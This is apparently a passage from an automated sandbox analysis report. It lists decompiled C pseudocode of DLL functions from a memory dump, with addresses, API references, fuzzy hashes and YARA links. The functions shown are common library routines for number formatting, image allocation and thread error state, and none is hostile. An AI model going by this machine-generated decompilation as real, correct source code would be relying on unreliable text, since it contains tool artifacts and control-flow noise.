										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E6EE36230( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E6EE55B80();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E6EE55B80();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E6EE55B80();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E6EE45C29(_t133, _t139, _t188, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E6EE55C60(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E6EE42012(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E6EE3AC66();
				goto L66;
			}

0x6ee4591a
0x6ee4591a
0x6ee45925
0x6ee4592a
0x6ee4592c
0x6ee4592c
0x6ee45930
0x6ee45939
0x6ee4593b
0x6ee45940
0x6ee45943
0x6ee45946
0x6ee4595c
0x6ee4595f
0x6ee45964
0x6ee4596e
0x6ee45973
0x6ee459ca
0x6ee459cc
0x6ee459db
0x6ee459de
0x6ee459e1
0x6ee459e3
0x6ee459ea
0x6ee459fc
0x6ee459ff
0x6ee45a04
0x6ee45a08
0x6ee45a09
0x6ee45a29
0x6ee45a2c
0x6ee45a2c
0x6ee45a2c
0x6ee45a2e
0x6ee45a2e
0x6ee45a31
0x6ee45a34
0x6ee45a36
0x6ee45a47
0x6ee45a38
0x6ee45a38
0x6ee45a38
0x6ee45a49
0x6ee45a4e
0x6ee45a4e
0x6ee45a53
0x6ee45a56
0x6ee45a60
0x6ee45a62
0x6ee45a64
0x6ee45a69
0x6ee45a6a
0x6ee45a6d
0x6ee45a70
0x6ee45a73
0x6ee45a73
0x6ee45a75
0x00000000
0x00000000
0x6ee45a8c
0x6ee45a93
0x6ee45a97
0x6ee45a9a
0x6ee45a9d
0x6ee45a9f
0x6ee45a9f
0x6ee45a9f
0x6ee45aa5
0x6ee45aa8
0x6ee45aac
0x6ee45aae
0x6ee45ab2
0x6ee45ab5
0x6ee45ab8
0x6ee45ab9
0x6ee45abc
0x6ee45abf
0x6ee45ac2
0x6ee45ac2
0x6ee45ac7
0x6ee45aca
0x6ee45acd
0x00000000
0x00000000
0x6ee45ad6
0x6ee45adb
0x6ee45ade
0x6ee45ae0
0x00000000
0x00000000
0x6ee45ae4
0x6ee45ae7
0x6ee45ae8
0x6ee45ae8
0x6ee45aea
0x6ee45aed
0x00000000
0x00000000
0x6ee45aef
0x6ee45af2
0x6ee45af9
0x6ee45afc
0x6ee45aff
0x6ee45b14
0x6ee45b14
0x6ee45b14
0x6ee45b01
0x6ee45b01
0x6ee45b04
0x6ee45b0e
0x6ee45b0e
0x6ee45b06
0x6ee45b09
0x6ee45b09
0x6ee45b10
0x6ee45b10
0x00000000
0x6ee45aff
0x6ee45af4
0x6ee45af4
0x6ee45af6
0x6ee45af6
0x6ee45a58
0x6ee45a58
0x6ee45a5a
0x6ee45b17
0x6ee45b17
0x6ee45b19
0x6ee45b1b
0x6ee45b1e
0x6ee45b1f
0x6ee45b20
0x6ee45b21
0x6ee45b29
0x6ee45b29
0x6ee45b2b
0x6ee45b2b
0x6ee45b2e
0x6ee45b31
0x6ee45b34
0x6ee45b36
0x6ee45b38
0x6ee45b38
0x6ee45b45
0x6ee45b4c
0x6ee45b53
0x6ee45b55
0x6ee45b5e
0x6ee45b5e
0x6ee45b61
0x6ee45b63
0x6ee45b66
0x6ee45b69
0x6ee45b75
0x6ee45b75
0x6ee45b79
0x6ee45b7c
0x6ee45b7e
0x00000000
0x6ee45b6b
0x6ee45b6b
0x6ee45b71
0x6ee45b71
0x6ee45b7f
0x6ee45b7f
0x6ee45b82
0x6ee45b86
0x6ee45b87
0x6ee45b89
0x6ee45b8b
0x6ee45b8d
0x6ee45bb7
0x6ee45bb7
0x6ee45bb9
0x6ee45bc6
0x6ee45bc6
0x6ee45bc7
0x6ee45bc8
0x6ee45bca
0x6ee45bcc
0x6ee45bd1
0x6ee45bd3
0x6ee45bd7
0x6ee45bda
0x6ee45bdd
0x6ee45bdf
0x6ee45be0
0x6ee45be0
0x6ee45be2
0x6ee45be2
0x6ee45be4
0x6ee45bf1
0x6ee45bf1
0x6ee45bf2
0x6ee45bf3
0x6ee45bf5
0x6ee45bf6
0x6ee45bf7
0x6ee45c00
0x6ee45c03
0x6ee45c05
0x6ee45c06
0x6ee45c06
0x6ee45c08
0x6ee45c08
0x6ee45c08
0x6ee45c0b
0x6ee45c0d
0x6ee45c10
0x6ee45c12
0x6ee45c18
0x6ee45c1d
0x6ee45c1d
0x6ee45c28
0x6ee45c28
0x6ee45be6
0x6ee45be8
0x00000000
0x00000000
0x6ee45bea
0x00000000
0x00000000
0x6ee45bec
0x6ee45bef
0x00000000
0x00000000
0x00000000
0x6ee45bef
0x6ee45bbb
0x6ee45bbd
0x00000000
0x00000000
0x6ee45bbf
0x00000000
0x00000000
0x6ee45bc1
0x6ee45bc4
0x00000000
0x00000000
0x00000000
0x6ee45bc4
0x6ee45b8f
0x6ee45b94
0x6ee45b9a
0x6ee45b9a
0x6ee45b9b
0x6ee45b9c
0x6ee45b9d
0x6ee45b9f
0x6ee45ba4
0x6ee45ba6
0x6ee45ba8
0x6ee45bad
0x6ee45bb0
0x6ee45bb2
0x6ee45bb5
0x6ee45bb5
0x00000000
0x6ee45bb5
0x6ee45b96
0x6ee45b98
0x00000000
0x00000000
0x00000000
0x6ee45b98
0x6ee45b6d
0x6ee45b6f
0x00000000
0x00000000
0x00000000
0x6ee45b6f
0x6ee45b69
0x00000000
0x6ee45a5a
0x6ee45a56
0x6ee45a0b
0x6ee45a17
0x6ee45a17
0x6ee45a19
0x6ee45a20
0x00000000
0x6ee45a20
0x6ee45a1b
0x00000000
0x6ee45a1b
0x6ee459ce
0x6ee459d4
0x6ee459d4
0x6ee459d7
0x6ee459d7
0x6ee459d8
0x00000000
0x6ee459d8
0x6ee459d0
0x6ee459d2
0x00000000
0x00000000
0x00000000
0x6ee459d2
0x6ee45990
0x6ee45995
0x6ee45997
0x6ee459a4
0x6ee459ab
0x6ee459ad
0x6ee459b8
0x6ee459b8
0x6ee459bb
0x6ee459bd
0x6ee459bd
0x6ee459c1
0x6ee45999
0x6ee45999
0x6ee45999
0x00000000
0x6ee45997
0x6ee45948
0x6ee4594f
0x6ee45950
0x6ee45952
0x00000000

APIs

_strrchr.LIBCMT ref: 6EE459A4

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d0b5b9c402bf1ce14bc7a2c9a132b330dbfeb54a82b4b34cc28cc28fa88d0c0e
Instruction ID: 7fc4f4fa75270669a69c0ca123c2f57074980de7a137a72f5504dd129a15a139
Opcode Fuzzy Hash: d0b5b9c402bf1ce14bc7a2c9a132b330dbfeb54a82b4b34cc28cc28fa88d0c0e
Instruction Fuzzy Hash: 2EB14932924246DFEB01CFE8D890BEEBBF5EF45354F34456AE8449B341E234994ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EE20800, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6EE20800(void* __edi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _t106;
				intOrPtr _t110;
				signed int _t124;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;

				_t192 = __edi;
				_v16 = 0;
				_t106 = E6EE20490(1, 0x24);
				_t194 = _t193 + 8;
				_v16 = _t106;
				if(_v16 == 0) {
					L12:
					return _v16;
				}
				 *((intOrPtr*)(_v16 + 0x14)) = _a12;
				 *((intOrPtr*)(_v16 + 0x10)) = _a4;
				_t110 = E6EE20490( *((intOrPtr*)(_v16 + 0x10)), 0x34);
				_t195 = _t194 + 8;
				 *((intOrPtr*)(_v16 + 0x18)) = _t110;
				if( *((intOrPtr*)(_v16 + 0x18)) != 0) {
					_v12 = 0;
					while(_v12 < _a4) {
						_v8 = _v12 * 0x34 +  *((intOrPtr*)(_v16 + 0x18));
						 *_v8 =  *((intOrPtr*)(_a8 + _v12 * 0x24));
						 *((intOrPtr*)(_v8 + 4)) =  *((intOrPtr*)(_a8 + 4 + _v12 * 0x24));
						 *(_v8 + 8) =  *(_a8 + 8 + _v12 * 0x24);
						 *(_v8 + 0xc) =  *(_a8 + 0xc + _v12 * 0x24);
						 *((intOrPtr*)(_v8 + 0x10)) =  *((intOrPtr*)(_a8 + 0x10 + _v12 * 0x24));
						 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_a8 + 0x14 + _v12 * 0x24));
						 *((intOrPtr*)(_v8 + 0x18)) =  *((intOrPtr*)(_a8 + 0x18 + _v12 * 0x24));
						 *((intOrPtr*)(_v8 + 0x1c)) =  *((intOrPtr*)(_a8 + 0x1c + _v12 * 0x24));
						_t124 = _a8;
						 *((intOrPtr*)(_v8 + 0x20)) =  *((intOrPtr*)(_t124 + 0x20 + _v12 * 0x24));
						if( *(_v8 + 0xc) == 0 ||  *(_v8 + 8) <= (_t124 | 0xffffffff) /  *(_v8 + 0xc) >> 2) {
							 *((intOrPtr*)(_v8 + 0x2c)) =  *0x6ee67164( *(_v8 + 8) *  *(_v8 + 0xc) << 2);
							if( *((intOrPtr*)(_v8 + 0x2c)) != 0) {
								E6EE38EC0(_t192,  *((intOrPtr*)(_v8 + 0x2c)), 0,  *(_v8 + 8) *  *(_v8 + 0xc) << 2);
								_t195 = _t195 + 0xc;
								_v12 = _v12 + 1;
								continue;
							}
							E6EE209C0(_v16);
							return 0;
						} else {
							E6EE209C0(_v16);
							return 0;
						}
					}
					goto L12;
				}
				E6EE209C0(_v16);
				return 0;
			}

0x6ee20800
0x6ee20806
0x6ee20811
0x6ee20816
0x6ee20819
0x6ee20820
0x6ee209b0
0x00000000
0x6ee209b0
0x6ee2082c
0x6ee20835
0x6ee20841
0x6ee20846
0x6ee2084c
0x6ee20856
0x6ee20868
0x6ee2087a
0x6ee20890
0x6ee208a0
0x6ee208b0
0x6ee208c1
0x6ee208d2
0x6ee208e3
0x6ee208f4
0x6ee20905
0x6ee20916
0x6ee20920
0x6ee20927
0x6ee20931
0x6ee20970
0x6ee2097a
0x6ee209a3
0x6ee209a8
0x6ee20877
0x00000000
0x6ee20877
0x6ee20980
0x00000000
0x6ee20949
0x6ee2094d
0x00000000
0x6ee20952
0x6ee20931
0x00000000
0x6ee2087a
0x6ee2085c
0x00000000

APIs

_opj_image_destroy@4.BCCW1XUJAH(00000000), ref: 6EE2085C

Part of subcall function 6EE209C0: _opj_image_data_free@4.BCCW1XUJAH(?), ref: 6EE20A0F

_opj_image_destroy@4.BCCW1XUJAH(00000000,00000000), ref: 6EE2094D

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _opj_image_destroy@4$_opj_image_data_free@4
String ID:
API String ID: 1102411199-0
Opcode ID: 48b8a36b8338adadc35b41712fc05f7be9f455fc454e20683f1cbedc531e9b2c
Instruction ID: 64a9645ac0a3e3762054e40f12f339f125851c7226148c88cb5a57dc7feb5fdd
Opcode Fuzzy Hash: 48b8a36b8338adadc35b41712fc05f7be9f455fc454e20683f1cbedc531e9b2c
Instruction Fuzzy Hash: FD617274A04209EFDB18CF94C5A199DB7B5FB88314F20C6AAD8155B395D731EE82CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCDDC0, Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EDCDDC0(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v52;
				char _v76;
				char _v100;
				intOrPtr _t51;
				intOrPtr _t54;
				intOrPtr _t81;

				_push(0xffffffff);
				_push(E6EE562B5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t81;
				_v20 = __ecx;
				E6EDB18A0( &_v100, __eflags, 0x6ee572f4);
				_v8 = 0;
				E6EDB12B0(__eflags,  &_v76,  &_v100, 0x6ee572f8);
				_v8 = 1;
				E6EDB30F0( &_v76);
				_push(E6EDB2660( &_v76));
				E6EDB1340(_t45);
				_t86 = _a4;
				if(_a4 == 0) {
					_v32 =  *_v20;
					_v36 =  *_v20 +  *((intOrPtr*)(_v32 + 0x3c));
					_t51 =  *_v20 +  *((intOrPtr*)(_v36 + 0x28));
					__eflags = _t51;
					_v40 = _t51;
					_v44 = _v40;
					_v8 = 0;
					E6EDB1D80( &_v76);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v100);
					_t54 = _v44;
				} else {
					E6EDB2C50( &_v52, _t86,  *_v20);
					_v24 = E6EDB2DF0( &_v52, _t86, _a4);
					_v28 = _v24;
					_v8 = 0;
					E6EDB1D80( &_v76);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v100);
					_t54 = _v28;
				}
				 *[fs:0x0] = _v16;
				return _t54;
			}

0x6edcddc3
0x6edcddc5
0x6edcddd0
0x6edcddd1
0x6edcdddb
0x6edcdde6
0x6edcddeb
0x6edcddff
0x6edcde07
0x6edcde0e
0x6edcde1b
0x6edcde1c
0x6edcde24
0x6edcde28
0x6edcde72
0x6edcde80
0x6edcde8b
0x6edcde8b
0x6edcde8e
0x6edcde94
0x6edcde97
0x6edcde9e
0x6edcdea3
0x6edcdead
0x6edcdeb2
0x6edcde2a
0x6edcde33
0x6edcde44
0x6edcde4a
0x6edcde4d
0x6edcde54
0x6edcde59
0x6edcde63
0x6edcde68
0x6edcde68
0x6edcdeb8
0x6edcdec2

APIs

task.LIBCPMTD ref: 6EDCDE54
task.LIBCPMTD ref: 6EDCDE63
task.LIBCPMTD ref: 6EDCDE9E
task.LIBCPMTD ref: 6EDCDEAD

Part of subcall function 6EDB2C50: task.LIBCPMTD ref: 6EDB2CC8
Part of subcall function 6EDB2C50: task.LIBCPMTD ref: 6EDB2CD7

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 4c56531c8b50951f3b3b9adf4aa8fe3b0cc9e49edecc980fe3dc411d1f50e82d
Instruction ID: d41e6aecde86b071fe232bcdede7ccfa6df2df9b3082c645a8066d6845e8687d
Opcode Fuzzy Hash: 4c56531c8b50951f3b3b9adf4aa8fe3b0cc9e49edecc980fe3dc411d1f50e82d
Instruction Fuzzy Hash: BA31EAB5D10209DFCB04DFD4C891AEEBBB8BF18314F144A59D41667390EB346A46CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EE444CA, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6EE444CA(void* __ecx, void* __edx, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;
				void* _t72;

				_t72 = __fp0;
				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6ee77be0; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6EE44DA2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6EE447A4(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6EE44DA2(__eflags,  *0x6ee77be0, _t51);
							if(__eflags != 0) {
								E6EE442CC(_t51, 0x6ee79584);
								E6EE4471C(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6EE44DA2(__eflags,  *0x6ee77be0, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6EE44DA2(0,  *0x6ee77be0, 0);
							_push(0);
							L9:
							E6EE4471C();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6EE44D63(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6ee77be0; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6EE3E6F4(_t39, _t43, _t49, _t53, _t60, _t72);
					asm("int3");
					_t5 =  *0x6ee77be0; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6EE44DA2(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6EE447A4(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6EE44DA2(__eflags,  *0x6ee77be0, _t60);
								if(__eflags != 0) {
									E6EE442CC(_t60, 0x6ee79584);
									E6EE4471C(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6EE44DA2(__eflags,  *0x6ee77be0, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6EE44DA2(__eflags,  *0x6ee77be0, _t20);
								_push(_t60);
								L25:
								E6EE4471C();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6EE44D63(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6ee77be0; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6EE3E6F4(_t39, _t43, _t49, _t53, _t60, _t72);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6ee77be0; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6EE44DA2(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6EE447A4(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6EE44DA2(__eflags,  *0x6ee77be0, _t54);
											if(__eflags != 0) {
												E6EE442CC(_t54, 0x6ee79584);
												E6EE4471C(0);
												goto L45;
											} else {
												_t40 = 0;
												E6EE44DA2(__eflags,  *0x6ee77be0, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6EE44DA2(0,  *0x6ee77be0, 0);
											_push(0);
											L41:
											E6EE4471C();
											goto L36;
										}
									}
								} else {
									_t54 = E6EE44D63(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6ee77be0; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6ee444ca
0x6ee444ca
0x6ee444ca
0x6ee444d5
0x6ee444d7
0x6ee444dc
0x6ee444df
0x6ee444fd
0x6ee44500
0x6ee44505
0x6ee44507
0x00000000
0x6ee44509
0x6ee44515
0x6ee44518
0x6ee44519
0x6ee4451b
0x6ee44540
0x6ee44542
0x6ee4455b
0x6ee44562
0x6ee44567
0x00000000
0x6ee44544
0x6ee44544
0x6ee4454d
0x6ee44552
0x00000000
0x6ee44552
0x6ee4451d
0x6ee4451d
0x6ee4451d
0x6ee44526
0x6ee4452b
0x6ee4452c
0x6ee4452c
0x6ee44531
0x00000000
0x6ee44531
0x6ee4451b
0x6ee444e1
0x6ee444e7
0x6ee444eb
0x6ee444f8
0x00000000
0x6ee444ed
0x6ee444f0
0x6ee4456a
0x6ee4456a
0x6ee444f2
0x6ee444f2
0x6ee444f2
0x6ee444f4
0x6ee444f4
0x6ee444f4
0x6ee444f0
0x6ee444eb
0x6ee4456d
0x6ee44575
0x6ee44577
0x6ee44579
0x6ee44581
0x6ee44586
0x6ee44587
0x6ee4458c
0x6ee4458d
0x6ee44590
0x6ee445aa
0x6ee445ad
0x6ee445b2
0x6ee445b4
0x00000000
0x6ee445b6
0x6ee445c2
0x6ee445c5
0x6ee445c6
0x6ee445c8
0x6ee445eb
0x6ee445ed
0x6ee44604
0x6ee4460b
0x6ee44610
0x00000000
0x6ee445ef
0x6ee445f6
0x6ee445fb
0x00000000
0x6ee445fb
0x6ee445ca
0x6ee445d1
0x6ee445d6
0x6ee445d7
0x6ee445d7
0x6ee445dc
0x00000000
0x6ee445dc
0x6ee445c8
0x6ee44592
0x6ee44598
0x6ee4459a
0x6ee4459c
0x6ee445a5
0x00000000
0x6ee4459e
0x6ee4459e
0x6ee445a1
0x6ee4461b
0x6ee4461b
0x6ee44620
0x6ee44623
0x6ee44624
0x6ee44625
0x6ee4462c
0x6ee4462e
0x6ee44633
0x6ee44636
0x6ee44654
0x6ee44657
0x6ee4465c
0x6ee4465e
0x00000000
0x6ee44660
0x6ee4466c
0x6ee44670
0x6ee44672
0x6ee44697
0x6ee44699
0x6ee446b2
0x6ee446b9
0x00000000
0x6ee4469b
0x6ee4469b
0x6ee446a4
0x6ee446a9
0x00000000
0x6ee446a9
0x6ee44674
0x6ee44674
0x6ee44674
0x6ee4467d
0x6ee44682
0x6ee44683
0x6ee44683
0x00000000
0x6ee44688
0x6ee44672
0x6ee44638
0x6ee4463e
0x6ee44640
0x6ee44642
0x6ee4464f
0x00000000
0x6ee44644
0x6ee44644
0x6ee44647
0x6ee446c1
0x6ee446c1
0x6ee44649
0x6ee44649
0x6ee44649
0x6ee44649
0x6ee4464b
0x6ee4464b
0x6ee4464b
0x6ee44647
0x6ee44642
0x6ee446c4
0x6ee446cc
0x6ee446ce
0x6ee446ce
0x6ee446d5
0x6ee445a3
0x6ee44613
0x6ee44613
0x6ee44615
0x00000000
0x6ee44617
0x6ee4461a
0x6ee4461a
0x6ee44615
0x6ee445a1
0x6ee4459c
0x6ee4457b
0x6ee44580
0x6ee44580

APIs

GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
_free.LIBCMT ref: 6EE4452C
_free.LIBCMT ref: 6EE44562
SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: db1ac533ebc53513d3b543b46c775fffa23ab8a5267cdb5a79c328ff0e147bb5
Instruction ID: bdf36e7838a2c9ecf35eb4706f32c64c5c6c9fadb2463a4b0e3612ccf1db45b7
Opcode Fuzzy Hash: db1ac533ebc53513d3b543b46c775fffa23ab8a5267cdb5a79c328ff0e147bb5
Instruction Fuzzy Hash: 8C11A736318917EE9F416DF6BC94D5A2A9E9BC26BDB34062AF624963C0EF658C038110

Uniqueness

Uniqueness Score: -1.00%

Function 6EE44621, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EE44621(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6ee77be0; // 0x7
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6EE44DA2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6EE447A4(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6EE44DA2(__eflags,  *0x6ee77be0, _t18);
							if(__eflags != 0) {
								E6EE442CC(_t18, 0x6ee79584);
								E6EE4471C(0);
